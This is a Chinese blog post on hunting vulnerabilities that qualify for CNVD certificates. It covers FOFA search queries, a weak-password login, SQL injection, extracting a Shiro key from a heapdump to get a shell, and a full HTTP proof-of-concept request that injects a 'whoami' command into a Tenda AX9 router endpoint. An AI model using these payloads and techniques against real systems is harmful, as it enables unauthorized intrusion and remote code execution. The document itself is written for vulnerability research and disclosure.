cnvd通用型漏洞挖掘思路

admin 2024年1月3日17:31:58评论121 views字数 2054阅读6分50秒阅读模式

对于有证书的收录标准事件型

事件型漏洞必须是三大运营商(移动、联通、电信)的中高危漏洞,或者党政机关、重要行业单位、科研院所、重要企事业单位(如:中央国有大型企业、部委直属事业单位等)的高危事件型漏洞才会颁发原创漏洞证书

通用型

中危及中危以上的通用性漏洞(CVSS2.0基准评分超过4.0)
软件开发商注册资金大于等于5000万人民币或者涉及党政机关、重要行业单位、科研院所、重要企事业单位(如:中央国有大型企业、部委直属事业单位等)的高危事件型漏洞
通用型漏洞得十个URL案例

1

思路1

cnvd通用型漏洞挖掘思路
LOVE

通过FOFA语法搜索

title="系统"title="门禁"title="设备"body="技术支持"body="技术支持" && title="系统""管理平台""管理系统"title="视频" && title="监控" && title="系统" && country="CN" && country="CN" && region!="HK" && status_code="200"等等都可以找到通用型产品
2

思路2

LOVE

通过爱企查方式+脚本

对于想要挖cnvd证书的师傅,我们可以通过爱企查的高级查询,导出5000万以上的企业

cnvd通用型漏洞挖掘思路

cnvd通用型漏洞挖掘思路

如果是挖APP的证书的话,勾上APP应用

cnvd通用型漏洞挖掘思路

后面在爱企查导出5000万以上的企业后我们配合脚本

https://github.com/colind0pe/new_cnvd_fofa_gather

通过公司名称,在fofa上搜索可能存在通用产品的公司,原理是判断网站标题数目以及独立IP数达到一定条件时将该标题以及公司名称导出;如果想挖掘cnvd证书,可导出注册资金大于5000w的公司到这个脚本中进行通用系统收集。

修改脚本第10、11行为你的FOFA账号的邮箱和API KEY

# 填入fofa账号的email和API_KEY
email = 'YOUR_EMAIL'
api_key = 'API_KEY'

将公司名称放入gs.txt文件中,执行该脚本即可

python3 new_cnvd_fofa_gather.py

cnvd通用型漏洞挖掘思路

3

思路3

比如我们通过FOFA

cnvd通用型漏洞挖掘思路

可以看到有相关搜索,这里全是可以测试的,也是最为费劲的方式

笔者在这里就找到了个餐厅管理平台,然后拿到了证书

cnvd通用型漏洞挖掘思路

通过admin 123456弱口令进入

cnvd通用型漏洞挖掘思路

cnvd通用型漏洞挖掘思路

在该处发现了SQL注入漏洞

cnvd通用型漏洞挖掘思路

也满足了证书派发条件

cnvd通用型漏洞挖掘思路

在后面又找到了SpringBoot泄露shiro的key然后shiro反序列化getshell的10.0评分漏洞

cnvd通用型漏洞挖掘思路

cnvd通用型漏洞挖掘思路

很可惜资本不够(无证书)

cnvd通用型漏洞挖掘思路

这里是通过Burp的SpringScan插件扫描到SpringBoot泄露

通过下载heapdump文件获得shiro密钥

获取其中的shiro key
JDumpSpider:https://github.com/whwlsfb/JDumpSpider
这个小工具可以自动爬取heapdump中的信息
直接运行:java -jar JDumpSpider.jar 放入你的heapdump文件 即可自动获取变量信息,这里获取到ShiroKey

cnvd通用型漏洞挖掘思路

两个密钥都可以尝试
然后利用Shiro反序列化工具gets

cnvd通用型漏洞挖掘思路

4

思路4

挖掘路由器漏洞(对于学二进制方向的师傅)

这里的案例是Tenda AX9命令注入RCE

此漏洞位于/goform/SetNetControlList接口

固件下载网址在这里

https://www.tenda.com.cn/download/detail-3734.html

cnvd通用型漏洞挖掘思路

下载好之后通过binwalk -t -e .bin文件提取固件系统

这里主要分析httpd文件和libtd_server.so文件

cnvd通用型漏洞挖掘思路

cnvd通用型漏洞挖掘思路

cnvd通用型漏洞挖掘思路

在sub_43FDCC中,list参数在未经验证的情况下被传递给sscanf,然后进一步传递给add_tc_traffic_control,这个是在libtd_server.so文件中定义的函数。在该函数中,通过v16进入到

doSystemCmd再发生在snprintf函数中造成命令注入
POC:

POST /goform/SetNetControlList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 43
Connection: close

list=233%0d;111;whoami;%0d233333%0d233333%0d

cnvd通用型漏洞挖掘思路

原文始发于微信公众号(PwnPigPig):cnvd通用型漏洞挖掘思路

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月3日17:31:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   cnvd通用型漏洞挖掘思路https://cn-sec.com/archives/2359653.html

发表评论

匿名网友 填写信息